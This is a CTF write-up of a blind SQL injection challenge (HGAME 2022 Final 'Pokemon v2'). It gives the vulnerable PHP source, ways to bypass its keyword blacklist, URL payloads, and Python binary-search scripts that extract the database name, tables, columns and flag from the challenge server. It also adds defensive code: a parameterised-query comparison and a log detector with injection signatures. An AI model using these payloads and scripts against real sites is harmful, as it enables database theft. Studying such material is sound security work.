HGAME 2022 Final Pokemon v2 writeup
2022-08-10 23:45:00 【ek1ng】
Challenge overview
A blind SQL injection challenge: there is no direct echo and the WAF blacklist is fairly long. I didn't solve it during the final, so I'm catching up on it now.
References:
http://dhycnhdu.com/index.php/archives/5/
https://blog.51cto.com/u_15400016/4287240
How to bypass filtering
The challenge gives us the source code, so let's first look at how to bypass the WAF based on it.
<?php
$server = $_ENV['MYSQL_ADDR'];
$username = $_ENV['MYSQL_USER'];
$password = $_ENV['MYSQL_PASSWORD'];
$database = $_ENV['DATABASE'];
$db = new mysqli($server, $username, $password, $database);
if ($db->connect_error) {
    die('数据库连接失败！'); // "Database connection failed!"
}
// Every blacklist entry is used as a case-insensitive regex; any match rejects the input.
function waf($code) {
    $blacklist = ['substr', 'mid', '=', 'like', '#', '\'', '"', '!','extract', 'update', '\^', '\$','union', '\bor\b', 'and', ' ', '\+', '-'];
    foreach($blacklist as $b) {
        if (preg_match('/'.$b.'/i', $code)) {
            return true;
        }
    }
    return false;
}
function getStatusMessage($code) {
    global $db;
    if (waf($code)) {
        return -1;
    }
    // Once it passes the blacklist, $code is concatenated straight into the query.
    $sql = 'SELECT code,msg FROM errors WHERE code='.$code;
    return $db->query($sql);
}
The code variable is concatenated directly into the SQL statement, which is what makes the SQL injection possible.
union is filtered, so a union query (which would return the query results directly) can't be used; only blind injection works here. Below are the bypasses for the WAF filters:
substr -> right(left(xxx,1),1)
space -> /**/
= -> in() or >
and -> %26%26
quoted strings -> hex encoding
subqueries need an extra pair of parentheses around them
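To show why this blacklist is the wrong control and what the fix looks like, here is an added example (my own code, not part of the challenge or of the original post). It re-implements the blacklist from waf() in Python, puts an allow-list check beside it (the parameter is an HTTP status code, so only a short integer is acceptable; in PHP that is filter_var($code, FILTER_VALIDATE_INT) followed by a prepared statement with bind_param), and runs the writeup's own probes through both a concatenating query and a parameterised one. An in-memory SQLite database with a constructed errors table stands in for the MySQL server, which is an assumption: SQLite accepts the /**/ and order by probes, but not the MySQL-only && and ascii() payload, so for that probe only the two validator results are meaningful.

```python
import re
import sqlite3

# The blacklist from the challenge's waf() above, applied as case-insensitive
# regexes exactly like the PHP preg_match loop. Values are checked after URL
# decoding, which is what PHP's $_GET hands to the application (so %26%26 is &&).
BLACKLIST = [r'substr', r'mid', r'=', r'like', r'#', r"'", r'"', r'!', r'extract',
             r'update', r'\^', r'\$', r'union', r'\bor\b', r'and', r' ', r'\+', r'-']


def blacklist_waf(code):
    """True if the challenge's waf() would reject this value."""
    return any(re.search(pattern, code, re.IGNORECASE) for pattern in BLACKLIST)


def allowlist_check(code):
    """Allow-list validation: an error code is a short decimal integer and nothing else.
    PHP equivalent: filter_var($code, FILTER_VALIDATE_INT) !== false."""
    return re.fullmatch(r'[0-9]{1,5}', code) is not None


def make_db():
    """In-memory SQLite stands in for the challenge's MySQL server (assumption);
    the table and its rows are constructed for this example."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE errors (code INTEGER, msg TEXT)')
    conn.executemany('INSERT INTO errors VALUES (?, ?)',
                     [(404, 'pokemon not found'), (500, 'internal error')])
    return conn


def vulnerable_query(conn, code):
    """Mirrors getStatusMessage(): blacklist, then concatenate the value into SQL.
    Returns -1 when the blacklist fires and False when the query errors (like mysqli)."""
    if blacklist_waf(code):
        return -1
    try:
        return conn.execute('SELECT code,msg FROM errors WHERE code=' + code).fetchall()
    except sqlite3.OperationalError:
        return False


def safe_query(conn, code):
    """Hardened form: validate the type, then bind the value as a parameter so the
    database never parses it as SQL."""
    if not allowlist_check(code):
        return -1
    return conn.execute('SELECT code,msg FROM errors WHERE code=?', (int(code),)).fetchall()


# The writeup's own probes, URL-decoded as the server sees them.
PROBES = {
    'plain': '404',
    'order_by_2': '404/**/order/**/by/**/2',
    'order_by_3': '404/**/order/**/by/**/3',
    # MySQL evaluates this one; SQLite has no && operator, so here it only errors.
    'and_bypass': '404/**/&&/**/ascii(right(left(database(),1),1))>112',
    'unobfuscated': '404 and ascii(substr(database(),1,1))>112',
}


def demo():
    """Per probe: (blocked by blacklist?, accepted by allow-list?, concatenated result, bound result)."""
    conn = make_db()
    return {name: (blacklist_waf(p), allowlist_check(p), vulnerable_query(conn, p), safe_query(conn, p))
            for name, p in PROBES.items()}


if __name__ == '__main__':
    for name, result in demo().items():
        print(name, result)
```

Running it shows the order by 3 probe slipping through the blacklist and producing a query error in the concatenating version (the "failed to query database" echo the writeup relies on), while the parameterised version rejects it before any SQL is built; the unobfuscated payload is the only one the blacklist catches, because it is the only one containing a space, "and" or "substr".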
Determining the injection point
First, the injection point: the code parameter on the error page is injectable.
Number of columns
Use order by to determine the number of columns returned.
/error.php?code=404/**/order/**/by/**/3
Echo: failed to query database
/error.php?code=404/**/order/**/by/**/2
Echo: pokemon not found
So there are 2 columns.
Database name length
/error.php?code=404/**/%26%26/**/if(length(database())>7,sleep(1),1)
Echo: pokemon not found
/error.php?code=404/**/%26%26/**/if(length(database())>6,sleep(1),1)
Echo: empty
So the database name is 7 characters long.
Database name
Original payload: /error.php?code=404 and ascii(substr(database(),1,1))>112
After bypassing the WAF:
/error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>112
Echo: empty
/error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>111
Echo: pokemon not found
So the first character of the database name is p.
Next we need a Python script. Injecting by hand is not practical; a script that uses binary search is much faster.
# -*- coding: utf-8 -*-
import requests
import re

# the echo text to look for in the response
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 8):
    print('----------------------------------------------------')
    min_value = 33
    max_value = 130
    mid = (min_value + max_value) // 2  # midpoint
    while (min_value < max_value):
        code = f"404/**/%26%26/**/ascii(right(left(database(),{i}),1))>{mid}"
        payload = baseurl + code
        r = requests.get(payload)
        # the 404 page echoed back means the condition holds, so mid is too small
        if (len(re.findall(findlink, r.text)) != 0):
            min_value = mid + 1
        # no echo means the condition fails, so mid is too large
        else:
            max_value = mid
        mid = (min_value + max_value) // 2
    dbs += chr(mid)
    print(dbs)
This gives the database name: pokemon
Table names
Original payload: ?code=404 and (ascii(substr((select table_name from information_schema.tables where table_schema='pokemon' limit 0,1),1,1)))>?
# -*- coding: utf-8 -*-
import requests
import re

# the echo text to look for in the response
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
    print('----------------------------------------------------')
    min_value = 33
    max_value = 130
    mid = (min_value + max_value) // 2  # midpoint
    while (min_value < max_value):
        code = f"404/**/%26%26/**/ascii(right(left((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(0x706f6b656d6f6e)/**/limit/**/0,1),{i}),1))>{mid}"
        payload = baseurl + code
        r = requests.get(payload)
        # the 404 page echoed back means the condition holds, so mid is too small
        if (len(re.findall(findlink, r.text)) != 0):
            min_value = mid + 1
        # no echo means the condition fails, so mid is too large
        else:
            max_value = mid
        mid = (min_value + max_value) // 2
    dbs += chr(mid)
    print(dbs)
This gives the table names errors,seeeeeeecret. When dumping the column names I use table_schema = 'pokemon', so the table name isn't needed there. There is also a problem with this script: since I didn't determine the length first, the length of the dumped result isn't certain, but usually there won't be repeated characters at the end.
Column names
Original payload: ?code=404 and (ascii(substr((select column_name from information_schema.columns where table_schema='pokemon' limit 0,1),1,1)))>?
# -*- coding: utf-8 -*-
import requests
import re

# the echo text to look for in the response
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
    print('----------------------------------------------------')
    min_value = 33
    max_value = 130
    mid = (min_value + max_value) // 2  # midpoint
    while (min_value < max_value):
        code = f"404/**/%26%26/**/ascii(right(left((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/(0x706f6b656d6f6e)/**/limit/**/0,1),{i}),1))>{mid}"
        payload = baseurl + code
        r = requests.get(payload)
        # the 404 page echoed back means the condition holds, so mid is too small
        if (len(re.findall(findlink, r.text)) != 0):
            min_value = mid + 1
        # no echo means the condition fails, so mid is too large
        else:
            max_value = mid
        mid = (min_value + max_value) // 2
    dbs += chr(mid)
    print(dbs)
This gives the column names: id,code,msg,flag
Values
Original payload: ?code=404 and (ascii(substr((select flag from seeeeeeecret limit 0,1),1,1)))>?
# -*- coding: utf-8 -*-
import requests
import re

# the echo text to look for in the response
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
    print('----------------------------------------------------')
    min_value = 33
    max_value = 130
    mid = (min_value + max_value) // 2  # midpoint
    while (min_value < max_value):
        code = f"404/**/%26%26/**/ascii(right(left((select/**/flag/**/from/**/seeeeeeecret/**/limit/**/0,1),{i}),1))>{mid}"
        payload = baseurl + code
        r = requests.get(payload)
        # the 404 page echoed back means the condition holds, so mid is too small
        if (len(re.findall(findlink, r.text)) != 0):
            min_value = mid + 1
        # no echo means the condition fails, so mid is too large
        else:
            max_value = mid
        mid = (min_value + max_value) // 2
    dbs += chr(mid)
    print(dbs)
hgame{96mz5v3c9hnj49t7xqj76et6xw4dpczy}
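From the detection side, the whole extraction above leaves a distinctive trail in the web server's access log: hundreds of requests to error.php from one client whose code parameter is not an integer, carrying /**/ in place of spaces, %26%26 in place of and, right(left(...)) in place of substr, hex literals and information_schema lookups, each ending in a varying >N threshold. The following added example (my own code, not from the original post) parses combined-format log lines, decodes the query string, tags those signatures and reports per-client counts. The log lines are constructed for the example: they replay the writeup's own probes from a made-up client address next to ordinary traffic from another.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined-format access log: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Signatures of the technique in this writeup, matched after URL decoding.
SIGNATURES = {
    'inline_comment': re.compile(r'/\*.*?\*/'),                 # /**/ standing in for spaces
    'double_amp': re.compile(r'&&'),                             # %26%26 standing in for and
    'right_left': re.compile(r'right\s*\(\s*left\s*\(', re.I),  # substr replacement
    'hex_literal': re.compile(r'0x[0-9a-f]{2,}', re.I),          # quoted strings as hex
    'info_schema': re.compile(r'information_schema', re.I),
    'timing': re.compile(r'\bsleep\s*\(', re.I),
}
THRESHOLD_RE = re.compile(r'>\s*(\d+)\s*$')  # trailing ">N" of a boolean probe

# Constructed sample log (not real traffic): 10.0.0.7 is an ordinary visitor,
# 192.0.2.55 replays the probes from this writeup.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Aug/2022:23:40:01 +0800] "GET /error.php?code=404 HTTP/1.1" 200 512
10.0.0.7 - - [10/Aug/2022:23:40:02 +0800] "GET /index.php HTTP/1.1" 200 2048
192.0.2.55 - - [10/Aug/2022:23:41:10 +0800] "GET /error.php?code=404/**/order/**/by/**/3 HTTP/1.1" 200 0
192.0.2.55 - - [10/Aug/2022:23:41:11 +0800] "GET /error.php?code=404/**/%26%26/**/if(length(database())>7,sleep(1),1) HTTP/1.1" 200 0
192.0.2.55 - - [10/Aug/2022:23:41:12 +0800] "GET /error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>112 HTTP/1.1" 200 0
192.0.2.55 - - [10/Aug/2022:23:41:13 +0800] "GET /error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>111 HTTP/1.1" 200 512
192.0.2.55 - - [10/Aug/2022:23:41:14 +0800] "GET /error.php?code=404/**/%26%26/**/ascii(right(left((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(0x706f6b656d6f6e)/**/limit/**/0,1),1),1))>81 HTTP/1.1" 200 0
"""


def inspect_code(path):
    """Return (decoded code value or None, matched signature names, trailing threshold or None)."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if 'code' not in qs:
        return None, [], None
    code = qs['code'][0]  # parse_qs percent-decodes, so %26%26 has become && here
    hits = [name for name, rx in SIGNATURES.items() if rx.search(code)]
    m = THRESHOLD_RE.search(code)
    return code, hits, int(m.group(1)) if m else None


def analyse(lines):
    """Aggregate per client: requests, non-integer code values, signatures, probe thresholds."""
    per_ip = defaultdict(lambda: {'requests': 0, 'non_integer_code': 0,
                                  'signatures': set(), 'thresholds': set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        stats = per_ip[m['ip']]
        stats['requests'] += 1
        code, hits, threshold = inspect_code(m['path'])
        if code is None or code.isdigit():
            continue  # a plain integer is the only legitimate shape for this parameter
        stats['non_integer_code'] += 1
        stats['signatures'].update(hits)
        if threshold is not None:
            stats['thresholds'].add(threshold)
    return dict(per_ip)


def suspicious_clients(report, min_probes=3):
    """Clients that sent several non-integer codes or any known bypass signature."""
    return sorted(ip for ip, s in report.items()
                  if s['non_integer_code'] >= min_probes or s['signatures'])


if __name__ == '__main__':
    report = analyse(SAMPLE_LOG.splitlines())
    for ip in suspicious_clients(report):
        s = report[ip]
        print(ip, s['non_integer_code'], 'non-integer code values,',
              sorted(s['signatures']), 'thresholds', sorted(s['thresholds']))
```

The non-integer check alone is enough to flag this traffic, since the legitimate parameter can only ever be a status code; the signature tags and the set of distinct thresholds are what tell an analyst that the requests were a binary search over data rather than a broken link, and the same tags make a useful allow-list-violation alert when placed in front of the application, where they complement rather than replace the parameterised query.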